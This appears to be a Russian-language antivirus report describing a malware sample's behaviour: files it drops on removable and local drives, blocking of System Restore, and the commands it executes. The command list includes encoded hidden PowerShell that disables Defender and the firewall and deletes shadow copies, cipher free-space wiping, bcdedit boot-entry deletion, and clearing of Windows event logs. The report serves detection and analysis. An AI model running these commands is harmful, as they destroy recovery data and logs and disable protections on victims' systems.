Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие файлы на съемном носителе
- <Имя диска съемного носителя>:\efstmpwp\fil26dd.tmp
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует:
- Компонент восстановления системы (SR)
Изменения в файловой системе
Создает следующие файлы
- D:\efstmpwp\fil2660.tmp
- C:\efstmpwp\fil269e.tmp
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZTsgbmV0c2ggYWR2ZmlyZXdhbGwgc2V0IGFsbHByb2ZpbGVzIHN0YXRlIG9mZjsgW1JlZl0uQXNzZW1ibHkuR2V0VHlwZ...
- '<SYSTEM32>\cipher.exe' /w:A
- '<SYSTEM32>\cipher.exe' /w:C
- '<SYSTEM32>\cipher.exe' /w:D
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand dnNzYWRtaW4gZGVsZXRlIHNoYWRvd3MgL2FsbCAvcXVpZXQ=
- '<SYSTEM32>\cipher.exe' /w:E
- '<SYSTEM32>\cipher.exe' /w:F
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\bcdedit.exe' /delete {current} /f
- '<SYSTEM32>\wevtutil.exe' cl System
- '<SYSTEM32>\wevtutil.exe' cl Security
- '<SYSTEM32>\wevtutil.exe' cl Application
- '<SYSTEM32>\wevtutil.exe' cl Setup
